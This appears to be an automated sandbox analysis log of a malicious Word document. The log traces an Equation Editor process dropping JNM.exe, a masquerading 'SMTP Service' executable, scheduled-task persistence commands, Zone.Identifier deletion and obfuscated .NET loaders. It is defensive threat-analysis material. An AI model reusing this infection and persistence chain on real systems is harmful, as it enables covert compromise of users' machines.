        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'
        Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'
        Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {C7405FE6-0EEB-43B9-A9C9-0A01615FAA8D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe 0
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'Jump to behavior
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe 0Jump to behavior
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exeJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Users\user\AppData\Roaming\JNM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Roaming\JNM.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: Binary string: Pinaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356181917.00000000004D6000.00000004.00000020.sdmp
        Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32 source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32h source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: MC:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbicddH?X source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
        Source: Binary string: 8inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
        Source: Binary string: >vbpC:\Users\user\AppData\Roaming\JNM.PDBBPJQ source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: 8(P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: Qsers\user\AppData\Roaming\JNM.exeVisualBasic.pdb*n source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
        Source: Binary string: 8C:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\user\AppData\Roaming\JNM.exe77-1006j_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp, JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: QC:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: M.PDBr source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
        Source: Binary string: (P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: ,:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
        Source: Binary string: )vbpC:\Users\user\AppData\Roaming\JNM.PDB.x source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 00000003.00000002.2366184294.0000000006EF0000.00000004.00000001.sdmp

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_0044C3E8 push esp; iretd 7_2_0044C551
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_006F234F push 00000000h; iretd 7_2_006F235C
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\JNM.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\JNM.exeFile created: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to dropped file

        Boot Survival:

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\user\AppData\Roaming\JNM.exeFile opened: C:\Users\user\AppData\Roaming\JNM.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
